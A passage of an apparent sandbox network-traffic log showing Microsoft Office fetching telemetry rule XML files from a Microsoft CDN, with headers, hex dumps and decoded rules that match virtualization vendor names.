                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                            x-ms-request-id: 5cb5275b-201e-0033-36eb-3ab167000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200522Z-r1d97b99577l6wbzhC1TEB3fwn00000009c000000000mff7
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            64192.168.2.44985913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:21 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:22 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                            x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200522Z-1777c6cb754mqztshC1TEB4mkc0000000a1000000000r72b
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            65192.168.2.44986013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:23 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:24 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                            x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200524Z-185f5d8b95crwqd8hC1NYCps680000000ap000000000xfzv
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:24 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            66192.168.2.44986113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:24 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:24 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                            x-ms-request-id: dd359c47-601e-0002-7817-3ba786000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200524Z-r1d97b99577d6qrbhC1TEBux5s00000009bg00000000th8h
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            67192.168.2.44986213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:24 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:24 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                            x-ms-request-id: 138215a1-101e-0017-6465-3b47c7000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200524Z-178bfbc474bq2pr7hC1NYCkfgg00000000pg000000005ra3
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:24 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            68192.168.2.44986313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:24 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:24 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                            x-ms-request-id: be70f01e-301e-000c-538c-3a323f000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200524Z-185f5d8b95csd4bwhC1NYCq7dc0000000ag000000001czpm
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            69192.168.2.44986413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:24 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:24 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                            x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200524Z-178bfbc474bwh9gmhC1NYCy3rs00000000n0000000000vbs
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            70192.168.2.44986513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:26 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:26 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                            x-ms-request-id: 8e68b2a4-701e-005c-1a8c-3abb94000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200526Z-185f5d8b95c9mqtvhC1NYCghtc0000000aq0000000014n85
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            71192.168.2.44986813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:26 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:26 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                            x-ms-request-id: af4852c5-601e-000d-3a8c-3a2618000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200526Z-185f5d8b95cqnkdjhC1NYCm8w80000000ahg00000000rgap
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:27 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            72192.168.2.44986713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:26 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:26 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                                            x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200526Z-178bfbc474bkvpdnhC1NYCuu2w00000000g00000000035m2
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:27 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
